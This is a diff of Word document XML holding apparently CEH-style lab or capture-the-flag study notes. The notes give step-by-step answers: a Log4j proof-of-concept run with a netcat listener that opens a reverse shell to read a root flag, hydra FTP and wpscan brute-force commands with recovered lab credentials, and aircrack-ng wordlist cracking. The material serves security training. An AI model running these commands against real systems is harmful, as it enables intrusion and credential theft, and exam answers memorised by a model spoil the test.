+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mmurphy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/Desktop</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">python3 -m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>http.server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 8000</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://&lt;parrot-ip&gt;:8000</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>You have identified a vulnerable web application on a Linux server at port 8080. Exploit the web application vulnerability, gain access to the server and enter the content of RootFlag.txt as the answer. (Format: Aa*</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aaNNNN</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">First find the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> hosting website in port 8080 using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. Then do further steps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>In home execute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>tar -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> jdk-8u202-linux-x64.tar.gz</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>mv jdk1.8.0_202 /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/bin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>cd log4j-shell-poc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pluma</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> poc.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Update the JDK Path in the Poc.py file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Change Line no: 62, replace jdk1.8.0_20/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javac</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with "/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/bin/jdk1.8.0_202/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javac</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Change Line no: 87, replace jdk1.8.0_20/bin/java with "/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/bin/jdk1.8.0_202/bin/java"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Change Line no: 99, replace jdk1.8.0_20/bin/java with "/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/bin/jdk1.8.0_202/bin/java"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">execute this in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seperate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> terminal [ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lvp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 9001]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>python3 poc.py --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>userip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> of attacker pc} --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 8080 --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 9001</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Copy the [send </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>this :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> value to be copied] from the output of previous command</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>paste in username box and type any password in password box, click login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Reverse shell connected in separate terminal where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is listening</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>type cat RootFlag.txt to view answer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">(If not connect to reverse shell reload the website and check the path and try </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>again )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>crc32 /home/attacker/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>PhoneSploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-Pro/Downloaded-Files/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">is used to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>calculate the CRC32 checksum of files</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> inside that folder. This helps you identify the CRC value required in the challenge.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">You are part of a cybersecurity team investigating an internal website that has been copied from a legitimate site without authorization. One of your teammates, acting as a spy, has scanned the website using a smart scanner within the subnet 192.168.10.0/24. Your task is to identify the number </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">of Directory Listing of Sensitive Files on this website. The report, named w_report.pdf, is available on the target </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>machine.(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Hint: He remembered the OS as Windows Server 19 while scanning the website) (Format: NN)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p 21 -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -O 192.168.10.0/24 –open</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>hydra -L users.txt -P rockyou.txt 192.168.10.144 ftp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>username: Parker and Password: Passw0rd@1234</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Access ftp and locate folder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>binary (to download pdf)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">get </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>w_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>report.pd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>open the report and read the site address</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Scan that website in Windows with Smart Scanner takes </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>upto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 30 min</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Scroll results to see Directory Listing of Sensitive Files.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>It shows 37 Approx but the answer is +/-1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>wpscan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+            <w:color w:val="0969DA"/>
+          </w:rPr>
+          <w:t>http://www.cehorg.com:8080/CEH/wp-login.php</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -U </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>adam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -P /home/attacker/rockyou.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>aircrack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-ng </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>http.cap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -w /Desktop/wordlist.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>remmina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>rdp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -5996,6 +8862,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0CEB3711"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="787A84E0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
